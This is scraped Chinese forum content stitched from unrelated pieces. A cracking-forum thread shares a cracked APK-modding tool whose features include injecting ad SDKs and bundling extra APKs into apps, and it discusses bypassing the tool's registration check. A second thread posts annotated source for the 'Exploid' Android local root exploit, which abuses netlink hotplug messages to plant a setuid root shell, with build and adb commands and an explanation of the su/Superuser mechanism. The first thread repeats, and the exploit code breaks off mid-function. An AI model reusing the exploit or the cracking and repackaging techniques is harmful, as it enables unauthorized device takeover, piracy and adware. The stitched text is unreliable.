安卓游改乐注册码大全编辑源码获取root失败怎么解决?
点击联系发帖人
时间:2016-08-22 17:31
查看: 12067|回复: 19
游改乐 V3.5.8 破解
阅读权限10
本帖最后由 qwe2913207 于
23:27 编辑
《游改乐》是一款基于windows平台的工具,其功能在不需要源代码的情况下,对APK进行任意更改 或 扩展新的功能。可用于在丢失源代码对APK进行修改,或研究其他的APK新技术等。
功能十分强大,聚集了所有需要的功能为一身。小巧玲珑但运行速度十分惊人,而且绿色免安装,是技术发烧友的不二之选。
此款应用基于java虚拟机,所以使用前你需要在你的计算机安装 java 或者 jdk1.7,才可正常的使用游改乐。
测试环境:win7 / win8
新版本功能:
-自定制浮漂SDK,一键化植入APK文件,让您的内容与网站接合,瞬间提升品牌形象。
-定制SDK广告:自定制SDK广告,植入给APK让你的广告效益大额提高,并支持3种广告方式。
-多工程文件混合管理:支持同时打开多文件多工程文件对比或修改。
-桌面图标快捷:一键化工具,对APK进行置入一个自定义手机桌面的快捷键,启动APK后将自动显示到手机桌面。
-捆绑新APK:一键化工具,对APK进行捆绑另一个新APK。用户启动APK程序后或提示另一个APK询问是否一键安装,新APK写入到APK内,会增大原来的APK文件。
-启动LOGO:置入一个程序启动时,显示的图片LOGO。支持置入多个LOGO。
-APK信息编辑器:对APK的应用标题/应用包名/应用版本/应用图标 一键化修改。
-强力打开:强力打开被各种加密的APK,调用各种类库进行匹配解密。
-垃圾类清理:自动化去除APK程序未调用的或无法调试的代码。
-图像编辑器:可对APK内所有可视图像进行涂鸦编辑,文字和图片水印等。
-代码对比器:可以对比两个APK对比出被修改的地点,并获取详情信息。
-16进制修改器:可以直接对dex进行修改以及其他文件修改。
-运行模:可自定规则对同类型APK进行一键化修改以及批量修改(内部有说明教程)
-NET反编译:可对NET类库进行修改。
-多程序包操作:可以导入数十个APK进行同时操作,无需等待。
-APK类加密:对APK包进行类加密,让APK不被再修改。
-调试编译:修改途中可进行调试编译,检查程序是否可运行。
-压缩加密与解密:对APK进行压缩加密,让APK无法解压。压缩解密,可以解除压缩加密。
-一键查看启动类文件:方便快捷的定位程序启动的第一个类。
-一键查看所有图像:一键查看APK内所有的可视图像。
-一键获取APK信息:一键获取APK的应用标题、支持固件、版本、包名、等。
-自动翻译:程序支持数十多国语言进行翻译,可设置好语言并且右键进行一键翻译。
-反编译集合:提供反编译APK以及获得Class类文件。
-一键存档置入:游戏的无限金币存档置入到APK包内。
-启动文字广告:启动游戏后即显示文字广告。
-进制数据转换:10进制 与 16进制互相转换。
-导出已修改:一键导出修改过的文件。
-APK签名:对APK进行重新签名,异常将自动修复签名。
-APK扫描:对APK进行详细信息的扫描。
-新版本进行了优化,速度更加快捷。更多体验需自己尝试!
如有疑问,可联系 QQ:已和谐 请勿留QQ号码 邮箱类信息 谢谢
_091901.jpg (51.37 KB, 下载次数: 27)
09:20 上传
密码: xes5
为什么我打开后是英文的?求解?&
/thread--1.html
谢谢 可用,解决了我的问题!
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
1年前就有了
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限20
本帖最后由 beta 于
11:15 编辑
这个软件的注册码是在线校验,以前注册过的电脑会把机器码记录在服务器,下次再注册就不行了
目前我在破这个软件,还有点小问题没搞定
我破解的和楼主破解的貌似一样,在我电脑一直FC
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限20
感谢楼主分享,吾爱由你更精彩~
没错!我的名字就是用来吸引仇恨的!
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限30
本帖最后由 倾听回忆 于
10:05 编辑
QQ截图20.png (200.22 KB, 下载次数: 21)
10:05 上传
没找到你截图的程序?
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限20
支持啊,顶起来
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限25
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限30
感谢分享啊。
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
感谢分享,对比功能很好
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限100
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限25
论坛是不可以留QQ号~尽快修改吧
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
免责声明:吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。
( 京ICP备号 | 京公网安备 87号 )
Powered by Discuz! X3.2
Comsenz Inc.查看: 7896|回复: 13
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
本帖最后由 H.U.C_泉泉 于
21:56 编辑
linux系统由udev提供系统设备的管理,比如提供热拔插usb设备等等。而Android把udev的工作移交给init进程。而linux中版本号小于1.4.1的udev不会检查是由内核还是用户发送热拔插信息。因此用户可以发送恶意的信息让内核加载定义的恶意程序从而取得root权限。该代码如下。
程序执行的顺序用(1)序号标明了。
通过在 下载编译工具
通过arm-none-eabi-gcc exploid.c -static -o exploid 编译
adb push exploid /data/local/tmp 目录中执行即可root
Android local root exploid (C) The Android Exploid Crew
[+] Using basedir=/data/local/tmp, path=/data/local/tmp/exploid_test
[+] opening NETLINK_KOBJECT_UEVENT socket
Try to invoke hotplug now, clicking at the wireless
settings, plugin USB key etc.
You succeeded if you find /system/bin/rootshell.
GUI might hang/restart meanwhile so be patient.#include &stdio.h&
#include &sys/socket.h&
#include &sys/types.h&
#include &linux/netlink.h&
#include &fcntl.h&
#include &errno.h&
#include &stdlib.h&
#include &string.h&
#include &unistd.h&
#include &sys/stat.h&
#include &signal.h&
#include &sys/mount.h&
int main(int argc, char **argv, char **env)
{
        char buf[512], path[512];
        
        struct sockaddr_
        struct iovec iov = {buf, sizeof(buf)};
        //(1)初始化要发送的数据,通过NET_LINK机制(参见man 手册,可以与内核实现近似于套接字的通信方式)发送
        struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};
        
        char *basedir = NULL;
        /* I hope there is no LD_ bug in androids rtld :) */
        //(11)root后执行rootshell则执行该步,直接创建一个有root权限的shell
        if (geteuid() == 0 && getuid() != 0)
                rootshell(env);
    //(2)获取程序的路径,为/data/local/tmp/exploid
        if (readlink(&/proc/self/exe&, path, sizeof(path)) & 0)
                die(&[-] readlink&);
        if (geteuid() == 0) {
        //(9)有内核加载热拔插固件时再次执行该应用,此时有效id为为0,有root权限
                clear_hotplug();
                /* remount /system rw */
               
                //(10)拷贝自己到/system/bin/目录下成为rootshell,并改变sh的文件属性
                remount_system(&/system&);
                if (copy(path, &/system/bin/rootshell&) != 0)
                        chmod(&/system/bin/sh&, 04755);
                else
                        chmod(&/system/bin/rootshell&, 04711);
                for (;;)
                        sleep(3);
        }
        printf(&[*] Android local root exploid (C) The Android Exploid Crew\n&);
    //(3)改变工作目录,没有root权限,只可以在少数目录执行
        basedir = &/sqlite_stmt_journals&;
        if (chdir(basedir) & 0) {
                basedir = &/data/local/tmp&;
                if (chdir(basedir) & 0)
                        basedir = strdup(getcwd(buf, sizeof(buf)));
        }
        printf(&[+] Using basedir=%s, path=%s\n&, basedir, path);
        printf(&[+] opening NETLINK_KOBJECT_UEVENT socket\n&);
        memset(&snl, 0, sizeof(snl));
        snl.nl_pid = 1;
        snl.nl_family = AF_NETLINK;
        
    //(4)构建一个NETLINK的套接字
        if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) & 0)
                die(&[-] socket&);
    //(5)创建要热拔插的文件,其中hotplug文件中存储的为/data/local/tmp/exploid
        close(creat(&loading&, 0666));
        if ((ofd = creat(&hotplug&, 0644)) & 0)
                die(&[-] creat&);
        if (write(ofd, path , strlen(path)) & 0)
                die(&[-] write&);
        close(ofd);
        
        //(6)建立一个data文件,为指向系统的hotplug的符号链接
        symlink(&/proc/sys/kernel/hotplug&, &data&);
        
        //(7)构建发送给内核的信息,内容为进行热拔插,固件位置在/data/local/tmp/hotplug
        snprintf(buf, sizeof(buf), &ACTION=add%cDEVPATH=/..%s%c&
                 &SUBSYSTEM=firmware%c&
                 &FIRMWARE=../../..%s/hotplug%c&, 0, basedir, 0, 0, basedir, 0);
        printf(&[+] sending add message ...\n&);
        
        //(8)发送该信息
        if (sendmsg(sock, &msg, 0) & 0)
                die(&[-] sendmsg&);
        close(sock);
        printf(&[*] Try to invoke hotplug now, clicking at the wireless\n&
               &[*] settings, plugin USB key etc.\n&
               &[*] You succeeded if you find /system/bin/rootshell.\n&
               &[*] GUI might hang/restart meanwhile so be patient.\n&);
        sleep(3);
        return 0;
}
void die(const char *msg)
{
        perror(msg);
        exit(errno);
}
int copy(const char *from, const char *to)
{
        int fd1, fd2;
        char buf[0x1000];
        int r = 0;
        if ((fd1 = open(from, O_RDONLY)) & 0)
                return -1;
        if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) & 0) {
                close(fd1);
                return -1;
        }
        for (;;) {
                r = read(fd1, buf, sizeof(buf));
                if (r &= 0)
                        
                if (write(fd2, buf, r) != r)
                        
        }
        close(fd1);
        close(fd2);
        sync(); sync();
        
}
void clear_hotplug()
{
 复制代码
&强烈要求发教程&
<p id="rate_844" onmouseover="showTip(this)" tip="我很赞同&威望 + 5
" class="mtn mbn">
<p id="rate_465" onmouseover="showTip(this)" tip="&威望 + 5
" class="mtn mbn">
<p id="rate_653" onmouseover="showTip(this)" tip="泉泉对这方面真是很有研究啊,支持!&金钱 + 5
" class="mtn mbn">
<p id="rate_899" onmouseover="showTip(this)" tip="学习&金钱 + 1
" class="mtn mbn">
最近比较忙,不会常在。
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
本文介绍了android中获取root权限的方法以及原理,让大家对android 玩家中常说的“越狱”有一个更深层次的认识。
二、 Root 的介绍
1. Root 的目的
可以让我们拥有掌控手机系统的权限,比如删除一些system/app下面的无用软件,更换开关机铃声和动画,拦截状态栏弹出的广告等。
2. Root的原理介绍
谷歌的android系统管理员用户就叫做root,该帐户拥有整个系统至高无上的权利,它可以访问和修改你手机几乎所有的文件,只有root才具备最高级别的管理权限。我们root手机的过程也就是获得手机最高使用权限的过程。同时为了防止不良软件也取得root用户的权限,当我们在root的过程中,还会给系统装一个程序,用来作为运行提示,由用户来决定,是否给予最高权限。这个程序的名字叫做Superuser.apk。当某些程序执行su指令想取得系统最高权限的时候,Superuser就会自动启动,拦截该动作并作出询问,当用户认为该程序可以安全使用的时候,那么我们就选择允许,否则,可以禁止该程序继续取得最高权限。Root的过程其实就是把su文件放到/system/bin/ Superuser.apk 放到system/app下面,还需要设置/system/bin/su可以让任意用户可运行,有set uid和set gid的权限。即要在android机器上运行命令:adb shell chmod 4755 /system/bin/su。而通常,厂商是不会允许我们随便这么去做的,我们就需要利用操作系统的各种漏洞,来完成这个过程。
特别说明:我们烧机中的Eng版本并没有Root权限
3. Root的方法
从Root的原理我们了解到,root 过程分三步:
a. adb push su /system/bin
b. adb push SuperUser.apk /system/app
c. adb shell chmod 4755 /system/bin/su
若系统是eng版的,做到以上三步,那么我们Root就大功告成,但实际是不行的。为什么呢?原因有三:
1、user版的/system路径是只读权限,不能简单写入
2、 chmod需要Root权才能运行(死循环了)
3、有些系统在启动时会自动将su的4755权限设成755,甚至直接删除su
那么针对这种情况,我们怎么办呢?非常简单:烧一个eng版本的boot.img就行了
可以用展讯的烧录工具,或者用fastboot模式从sd卡烧一个boot.img文件即可
至此,我们Root就成功了,可以用R.E(Root Explorer)在根目录创建和删除文件。
三、 深入理解Root机制
其流程是:
1. Su 被用户调用
2. Su 创建了一个socket监听
3. Su 向Superuser发送了一个广播,说是有一个程序要请求root
4. Su 等待socket 数据接收。有超时处理。
5. Superuser 界面收到广播后,弹出一个对话框,询问用户
6. Superuser 向传来的数据中的socket写回用户应答结果。
7. Su 根据socket得到的结果处理应该不应该继续执行
8. 完成提权管理
superuser.apk这个程序是root成功后,专门用来管理root权限使用的,防止被恶意程序滥用。
源码地址:
我们有两点疑问:
1. superuser是怎么知道谁想用root权限?
2. superuser是如何把用户的选择告诉su程序的?
即superuser和su程序是如何通讯的,他们俩位于不通的时空,一个在java虚拟中,一个在linux的真实进程中。
superuser共有两个activity: SuperuserActivity 和 SuperuserRequestActivity ,其中SuperuserActivity 主要是用来管理白名单的,就是记住哪个程序已经被允许使用root权限了,省的每次用时都问用户。
SuperuserRequestActivity 就是用来询问用户目前有个程序想使用root权限,是否允许,是否一直允许,即放入白名单。
这个白名单比较关键,是一个sqlite数据库文件,位置:
/data/data/com.koushikdutta.superuser/databases/superuser.sqlite
上文说过,root的本质就是往 /system/bin/ 下放一个su文件,不检查调用者权限的su文件。普通程序可以调用该su来运行root权限的命令。superuser.apk中就自带了一个这样的su程序。一开始superuser会检测/system/bin/su是否存在:
File su = new File(&/system/bin/su&);
// 检测su文件是否存在,如果不存在则直接返回
if (!su.exists()) {
Toast toast = Toast.makeText(this, &Unable to find /system/bin/su.&, Toast.LENGTH_LONG);
toast.show();
//如果大小一样,则认为su文件正确,直接返回了事。
if (su.length() == suStream.available())
suStream.close();
// 如果检测到/system/bin/su 文件存在,但是不对头,则把自带的su先写到&/data/data/com.koushikdutta.superuser/su&
//再写到/system/bin/su。
byte[] bytes = new byte[suStream.available()];
DataInputStream dis = new DataInputStream(suStream);
dis.readFully(bytes);
FileOutputStream suOutStream = new FileOutputStream(&/data/data/com.koushikdutta.superuser/su&);
suOutStream.write(bytes);
suOutStream.close();
Process process = Runtime.getRuntime().exec(&su&);
DataOutputStream os = new DataOutputStream(process.getOutputStream());
os.writeBytes(&mount -oremount,rw /dev/block/mtdblock3 /system\n&);
os.writeBytes(&busybox cp /data/data/com.koushikdutta.superuser/su /system/bin/su\n&);
os.writeBytes(&busybox chown 0:0 /system/bin/su\n&);
os.writeBytes(&chmod 4755 /system/bin/su\n&);
os.writeBytes(&exit\n&);
os.flush();
有进程使用root权限,superuser是怎么知道的呢,关键是句:
sprintf(sysCmd, &am start -a android.intent.action.MAIN
-n com.koushikdutta.superuser/com.koushikdutta.superuser.SuperuserRequestActivity
--ei uid %d --ei pid %d & /dev/null&, g_puid, ppid);
if (system(sysCmd))
return executionFailure(&am.&);
最近比较忙,不会常在。
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
   原理是am命令,am的用法:  usage: am [subcommand] [options]
    start an Activity: am start [-D] [-W] &INTENT&
        -D: enable debugging
        -W: wait for launch to complete
    start a Service: am startservice &INTENT&
    send a broadcast Intent: am broadcast &INTENT&
    start an Instrumentation: am instrument [flags] &COMPONENT&
        -r: print raw results (otherwise decode REPORT_KEY_STREAMRESULT)
        -e &NAME& &VALUE&: set argument &NAME& to &VALUE&
        -p &FILE&: write profiling data to &FILE&
        -w: wait for instrumentation to finish before returning
    start profiling: am profile &PROCESS& start &FILE&
    stop profiling: am profile &PROCESS& stop
    &INTENT& specifications include these flags:
        [-a &ACTION&] [-d &DATA_URI&] [-t &MIME_TYPE&]
        [-c &CATEGORY& [-c &CATEGORY&] ...]
        [-e|--es &EXTRA_KEY& &EXTRA_STRING_VALUE& ...]
        [--esn &EXTRA_KEY& ...]
        [--ez &EXTRA_KEY& &EXTRA_BOOLEAN_VALUE& ...]
        [-e|--ei &EXTRA_KEY& &EXTRA_INT_VALUE& ...]
        [-n &COMPONENT&] [-f &FLAGS&]
        [--grant-read-uri-permission] [--grant-write-uri-permission]
        [--debug-log-resolution]
        [--activity-brought-to-front] [--activity-clear-top]
        [--activity-clear-when-task-reset] [--activity-exclude-from-recents]
        [--activity-launched-from-history] [--activity-multiple-task]
        [--activity-no-animation] [--activity-no-history]
        [--activity-no-user-action] [--activity-previous-is-top]
        [--activity-reorder-to-front] [--activity-reset-task-if-needed]
        [--activity-single-top]
        [--receiver-registered-only] [--receiver-replace-pending]
        [&URI&]复制代码
最近比较忙,不会常在。
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
还有个疑点,就是su怎么知道用户是允许root权限还是反对呢?原来是上面提到的白名单起来作用,superuser把用户的选择放入:
/data/data/com.koushikdutta.superuser/databases/superuser.sqlite    数据库中,然后su进程再去读该数据库来判断是否允许。
四、 资源文件的获取
从上文的源码地址获取源代码,替换系统的system/extras/su/下面的su.c 和Android.mk文件,使用编译命令 ./mk td28 u adr system/extras/su/ 编译成功后会生成out/target/product/hsdroid/system/xbin/su 文件,而Superuser.apk就是普通的apk文件,都在源码地址里面可以下载,下载后倒入到eclipse即可直接运行。
在阅读完本文后,可以站在专业的角度了解root的真正原理,以及有用户有需求时我们可以帮助其快速的解决问题。
最近比较忙,不会常在。
UID356456注册时间最后登录在线时间33 小时阅读权限20积分129精华0
红盟菜鸟, 积分 129, 距离下一级还需 21 积分
TA的每日心情擦汗 15:07:11签到天数: 94 天[LV.6]常住居民II金钱727 UID356456注册时间最后登录在线时间33 小时阅读权限20积分129精华0
做一下沙发,不懂。。。。谢谢楼主
UID393027注册时间最后登录在线时间78 小时阅读权限20积分121精华0
红盟菜鸟, 积分 121, 距离下一级还需 29 积分
TA的每日心情衰 12:19:22签到天数: 50 天[LV.5]常住居民I金钱460 UID393027注册时间最后登录在线时间78 小时阅读权限20积分121精华0
吾的手机不是安卓的说…
犯我中华龙威者必诛之
UID368965注册时间最后登录在线时间476 小时阅读权限70积分3195精华0
红盟先锋, 积分 3195, 距离下一级还需 805 积分
TA的每日心情奋斗昨天&20:10签到天数: 716 天[LV.9]以坛为家II金钱7685 UID368965注册时间最后登录在线时间476 小时阅读权限70积分3195精华0
还是不懂怎么root。。。
UID367465注册时间最后登录在线时间151 小时阅读权限50积分822精华0
红盟成员, 积分 822, 距离下一级还需 1178 积分
TA的每日心情奋斗 17:05:38签到天数: 76 天[LV.6]常住居民II金钱1465 UID367465注册时间最后登录在线时间151 小时阅读权限50积分822精华0
我想说,真的看不懂啊!不过了解一下还好
道,可道,非常道;名,可名,非常名。
UID391431注册时间最后登录在线时间31 小时阅读权限30积分161精华0
红盟学员, 积分 161, 距离下一级还需 539 积分
TA的每日心情开心 22:18:59签到天数: 62 天[LV.6]常住居民II金钱575 UID391431注册时间最后登录在线时间31 小时阅读权限30积分161精华0
眼花了。。。放假回家慢慢研究。。谢谢lz分享
UID136746注册时间最后登录在线时间201 小时阅读权限50积分928精华0
红盟成员, 积分 928, 距离下一级还需 1072 积分
TA的每日心情开心 17:25:53签到天数: 212 天[LV.7]常住居民III金钱2262 UID136746注册时间最后登录在线时间201 小时阅读权限50积分928精华0
我这个人吧,最没耐心。额
complicated
UID302624注册时间最后登录在线时间84 小时阅读权限50积分803精华0
红盟成员, 积分 803, 距离下一级还需 1197 积分
TA的每日心情怒 18:23:16签到天数: 197 天[LV.7]常住居民III金钱2221 UID302624注册时间最后登录在线时间84 小时阅读权限50积分803精华0
还是看视屏+教程实在&&你这样的我都晕了
做一名正直的红客
UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
红盟学员, 积分 548, 距离下一级还需 152 积分
TA的每日心情怒 09:02:11签到天数: 94 天[LV.6]常住居民II金钱1057 UID381925注册时间最后登录在线时间116 小时阅读权限30积分548精华1
正在准备着。。先凑合吧
最近比较忙,不会常在。
UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
红盟学员, 积分 298, 距离下一级还需 402 积分
TA的每日心情无聊 18:06:41签到天数: 135 天[LV.7]常住居民III金钱1441 UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
360一键root这些应该也是有Superuser.apk这个程序原理的吧,Eng版本是什么?手机把语言换成英文?
UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
红盟学员, 积分 298, 距离下一级还需 402 积分
TA的每日心情无聊 18:06:41签到天数: 135 天[LV.7]常住居民III金钱1441 UID66939注册时间最后登录在线时间40 小时阅读权限30积分298精华0
如11楼说的,如果做出视频真人语音解说的话,表示热烈欢迎,楼主辛苦了!
全体成员请点此查看详细内容
Powered by}
游改乐 V3.5.8 破解
阅读权限10
本帖最后由 qwe2913207 于
23:27 编辑
《游改乐》是一款基于windows平台的工具,其功能在不需要源代码的情况下,对APK进行任意更改 或 扩展新的功能。可用于在丢失源代码对APK进行修改,或研究其他的APK新技术等。
功能十分强大,聚集了所有需要的功能为一身。小巧玲珑但运行速度十分惊人,而且绿色免安装,是技术发烧友的不二之选。
此款应用基于java虚拟机,所以使用前你需要在你的计算机安装 java 或者 jdk1.7,才可正常的使用游改乐。
测试环境:win7 / win8
新版本功能:
-自定制浮漂SDK,一键化植入APK文件,让您的内容与网站接合,瞬间提升品牌形象。
-定制SDK广告:自定制SDK广告,植入给APK让你的广告效益大额提高,并支持3种广告方式。
-多工程文件混合管理:支持同时打开多文件多工程文件对比或修改。
-桌面图标快捷:一键化工具,对APK进行置入一个自定义手机桌面的快捷键,启动APK后将自动显示到手机桌面。
-捆绑新APK:一键化工具,对APK进行捆绑另一个新APK。用户启动APK程序后或提示另一个APK询问是否一键安装,新APK写入到APK内,会增大原来的APK文件。
-启动LOGO:置入一个程序启动时,显示的图片LOGO。支持置入多个LOGO。
-APK信息编辑器:对APK的应用标题/应用包名/应用版本/应用图标 一键化修改。
-强力打开:强力打开被各种加密的APK,调用各种类库进行匹配解密。
-垃圾类清理:自动化去除APK程序未调用的或无法调试的代码。
-图像编辑器:可对APK内所有可视图像进行涂鸦编辑,文字和图片水印等。
-代码对比器:可以对比两个APK对比出被修改的地点,并获取详情信息。
-16进制修改器:可以直接对dex进行修改以及其他文件修改。
-运行模:可自定规则对同类型APK进行一键化修改以及批量修改(内部有说明教程)
-NET反编译:可对NET类库进行修改。
-多程序包操作:可以导入数十个APK进行同时操作,无需等待。
-APK类加密:对APK包进行类加密,让APK不被再修改。
-调试编译:修改途中可进行调试编译,检查程序是否可运行。
-压缩加密与解密:对APK进行压缩加密,让APK无法解压。压缩解密,可以解除压缩加密。
-一键查看启动类文件:方便快捷的定位程序启动的第一个类。
-一键查看所有图像:一键查看APK内所有的可视图像。
-一键获取APK信息:一键获取APK的应用标题、支持固件、版本、包名、等。
-自动翻译:程序支持数十多国语言进行翻译,可设置好语言并且右键进行一键翻译。
-反编译集合:提供反编译APK以及获得Class类文件。
-一键存档置入:游戏的无限金币存档置入到APK包内。
-启动文字广告:启动游戏后即显示文字广告。
-进制数据转换:10进制 与 16进制互相转换。
-导出已修改:一键导出修改过的文件。
-APK签名:对APK进行重新签名,异常将自动修复签名。
-APK扫描:对APK进行详细信息的扫描。
-新版本进行了优化,速度更加快捷。更多体验需自己尝试!
如有疑问,可联系 QQ:已和谐 请勿留QQ号码 邮箱类信息 谢谢
_091901.jpg (51.37 KB, 下载次数: 27)
09:20 上传
密码: xes5
为什么我打开后是英文的?求解?&
/thread--1.html
谢谢 可用,解决了我的问题!
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
1年前就有了
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限20
本帖最后由 beta 于
11:15 编辑
这个软件的注册码是在线校验,以前注册过的电脑会把机器码记录在服务器,下次再注册就不行了
目前我在破这个软件,还有点小问题没搞定
我破解的和楼主破解的貌似一样,在我电脑一直FC
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限20
感谢楼主分享,吾爱由你更精彩~
没错!我的名字就是用来吸引仇恨的!
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限30
本帖最后由 倾听回忆 于
10:05 编辑
QQ截图20.png (200.22 KB, 下载次数: 21)
10:05 上传
没找到你截图的程序?
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限20
支持啊,顶起来
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限25
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限30
感谢分享啊。
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限10
感谢分享,对比功能很好
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限100
发帖求助前要善用【】功能,那里可能会有你要找的答案;如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】和【CB】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
阅读权限25
论坛是不可以留QQ号~尽快修改吧
